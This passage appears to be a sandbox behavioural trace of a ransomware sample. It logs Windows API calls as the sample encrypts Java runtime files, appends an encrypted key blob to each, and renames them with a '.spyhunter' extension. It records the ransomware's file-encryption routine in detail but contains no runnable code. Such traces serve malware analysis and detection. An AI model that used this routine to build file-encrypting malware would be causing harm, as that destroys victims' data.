[0173.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssvagent.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssvagent.exe.spyhunter")) returned 1 [0173.832] GetProcessHeap () returned 0x2c0000 [0173.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.832] GetProcessHeap () returned 0x2c0000 [0173.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0173.832] GetProcessHeap () returned 0x2c0000 [0173.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3428 | out: hHeap=0x2c0000) returned 1 [0173.832] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce410 | out: pbBuffer=0x25ce410) returned 1 [0173.832] GetProcessHeap () returned 0x2c0000 [0173.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0173.832] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce408*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce408*=0x30) returned 1 [0173.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0173.833] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll") returned 48 [0173.833] StrStrW (lpFirst="ssv.dll", lpSrch=".txt") returned 0x0 [0173.833] GetProcessHeap () returned 0x2c0000 [0173.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0173.833] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce3cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.834] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.835] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce3cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.835] GetProcessHeap () returned 0x2c0000 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0173.835] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.835] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce40c*, lpNumberOfBytesWritten=0x25ce3cc*=0x4, lpOverlapped=0x0) returned 1 [0173.930] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3cc*=0x30, lpOverlapped=0x0) returned 1 [0173.930] CloseHandle (hObject=0x9c) returned 1 [0174.036] GetProcessHeap () returned 0x2c0000 [0174.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.037] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll.spyhunter") returned 58 [0174.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssv.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssv.dll.spyhunter")) returned 1 [0174.038] GetProcessHeap () returned 0x2c0000 [0174.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.038] GetProcessHeap () returned 0x2c0000 [0174.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.038] GetProcessHeap () returned 0x2c0000 [0174.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21af0 | out: hHeap=0x2c0000) returned 1 [0174.038] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce408 | out: pbBuffer=0x25ce408) returned 1 [0174.038] GetProcessHeap () returned 0x2c0000 [0174.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce400*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce400*=0x30) returned 1 [0174.039] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmid.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.039] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe") returned 49 [0174.040] StrStrW (lpFirst="rmid.exe", lpSrch=".txt") returned 0x0 [0174.040] GetProcessHeap () returned 0x2c0000 [0174.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.040] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce3c4*=0x2800, lpOverlapped=0x0) returned 1 [0174.056] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.057] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce3c4*=0x2800, lpOverlapped=0x0) returned 1 [0174.057] GetProcessHeap () returned 0x2c0000 [0174.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.057] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.057] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce404*, lpNumberOfBytesWritten=0x25ce3c4*=0x4, lpOverlapped=0x0) returned 1 [0174.105] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3c4*=0x30, lpOverlapped=0x0) returned 1 [0174.105] CloseHandle (hObject=0x9c) returned 1 [0174.105] GetProcessHeap () returned 0x2c0000 [0174.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.105] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe.spyhunter") returned 59 [0174.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmid.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmid.exe.spyhunter")) returned 1 [0174.106] GetProcessHeap () returned 0x2c0000 [0174.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.106] GetProcessHeap () returned 0x2c0000 [0174.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.106] GetProcessHeap () returned 0x2c0000 [0174.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21a40 | out: hHeap=0x2c0000) returned 1 [0174.107] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce408 | out: pbBuffer=0x25ce408) returned 1 [0174.107] GetProcessHeap () returned 0x2c0000 [0174.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.107] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce400*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce400*=0x30) returned 1 [0174.107] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\pack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.108] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe") returned 52 [0174.108] StrStrW (lpFirst="pack200.exe", lpSrch=".txt") returned 0x0 [0174.108] GetProcessHeap () returned 0x2c0000 [0174.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.108] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce3c4*=0x2800, lpOverlapped=0x0) returned 1 [0174.307] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.307] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce3c4*=0x2800, lpOverlapped=0x0) returned 1 [0174.307] GetProcessHeap () returned 0x2c0000 [0174.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.307] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.307] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce404*, lpNumberOfBytesWritten=0x25ce3c4*=0x4, lpOverlapped=0x0) returned 1 [0174.315] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3c4*=0x30, lpOverlapped=0x0) returned 1 [0174.315] CloseHandle (hObject=0x9c) returned 1 [0174.315] GetProcessHeap () returned 0x2c0000 [0174.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.315] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe.spyhunter") returned 62 [0174.316] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\pack200.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\pack200.exe.spyhunter")) returned 1 [0174.317] GetProcessHeap () returned 0x2c0000 [0174.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.317] GetProcessHeap () returned 0x2c0000 [0174.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.317] GetProcessHeap () returned 0x2c0000 [0174.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3148 | out: hHeap=0x2c0000) returned 1 [0174.317] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce400 | out: pbBuffer=0x25ce400) returned 1 [0174.317] GetProcessHeap () returned 0x2c0000 [0174.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.317] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3f8*=0x30) returned 1 [0174.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npjpi170_45.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.318] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll") returned 56 [0174.318] StrStrW (lpFirst="npjpi170_45.dll", lpSrch=".txt") returned 0x0 [0174.318] GetProcessHeap () returned 0x2c0000 [0174.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.318] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce3bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.357] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.357] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce3bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.357] GetProcessHeap () returned 0x2c0000 [0174.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.357] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.357] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x25ce3fc*, lpNumberOfBytesWritten=0x25ce3bc*=0x4, lpOverlapped=0x0) returned 1 [0174.358] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3bc*=0x30, lpOverlapped=0x0) returned 1 [0174.358] CloseHandle (hObject=0x9c) returned 1 [0174.358] GetProcessHeap () returned 0x2c0000 [0174.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.359] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll.spyhunter") returned 66 [0174.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npjpi170_45.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npjpi170_45.dll.spyhunter")) returned 1 [0174.360] GetProcessHeap () returned 0x2c0000 [0174.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.360] GetProcessHeap () returned 0x2c0000 [0174.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.360] GetProcessHeap () returned 0x2c0000 [0174.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f7c0 | out: hHeap=0x2c0000) returned 1 [0174.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce400 | out: pbBuffer=0x25ce400) returned 1 [0174.360] GetProcessHeap () returned 0x2c0000 [0174.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3f8*=0x30) returned 1 [0174.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\mlib_image.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.361] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll") returned 55 [0174.361] StrStrW (lpFirst="mlib_image.dll", lpSrch=".txt") returned 0x0 [0174.361] GetProcessHeap () returned 0x2c0000 [0174.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.361] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce3bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.403] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.404] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce3bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.404] GetProcessHeap () returned 0x2c0000 [0174.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.404] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.404] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x25ce3fc*, lpNumberOfBytesWritten=0x25ce3bc*=0x4, lpOverlapped=0x0) returned 1 [0174.461] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3bc*=0x30, lpOverlapped=0x0) returned 1 [0174.461] CloseHandle (hObject=0x9c) returned 1 [0174.513] GetProcessHeap () returned 0x2c0000 [0174.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.513] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll.spyhunter") returned 65 [0174.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\mlib_image.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\mlib_image.dll.spyhunter")) returned 1 [0174.515] GetProcessHeap () returned 0x2c0000 [0174.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.515] GetProcessHeap () returned 0x2c0000 [0174.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.515] GetProcessHeap () returned 0x2c0000 [0174.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2f20 | out: hHeap=0x2c0000) returned 1 [0174.515] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3f8 | out: pbBuffer=0x25ce3f8) returned 1 [0174.515] GetProcessHeap () returned 0x2c0000 [0174.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.515] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3f0*=0x30) returned 1 [0174.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsound.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.516] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll") returned 51 [0174.516] StrStrW (lpFirst="jsound.dll", lpSrch=".txt") returned 0x0 [0174.516] GetProcessHeap () returned 0x2c0000 [0174.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0174.516] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.519] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.519] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.519] GetProcessHeap () returned 0x2c0000 [0174.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0174.519] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.519] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3b4, lpOverlapped=0x0 | out: lpBuffer=0x25ce3f4*, lpNumberOfBytesWritten=0x25ce3b4*=0x4, lpOverlapped=0x0) returned 1 [0174.583] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3b4*=0x30, lpOverlapped=0x0) returned 1 [0174.583] CloseHandle (hObject=0xb0) returned 1 [0174.624] GetProcessHeap () returned 0x2c0000 [0174.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.624] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll.spyhunter") returned 61 [0174.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsound.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsound.dll.spyhunter")) returned 1 [0174.626] GetProcessHeap () returned 0x2c0000 [0174.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.626] GetProcessHeap () returned 0x2c0000 [0174.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.626] GetProcessHeap () returned 0x2c0000 [0174.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21410 | out: hHeap=0x2c0000) returned 1 [0174.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3f8 | out: pbBuffer=0x25ce3f8) returned 1 [0174.626] GetProcessHeap () returned 0x2c0000 [0174.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3f0*=0x30) returned 1 [0174.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.627] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll") returned 51 [0174.627] StrStrW (lpFirst="jp2ssv.dll", lpSrch=".txt") returned 0x0 [0174.627] GetProcessHeap () returned 0x2c0000 [0174.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.628] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3b4, 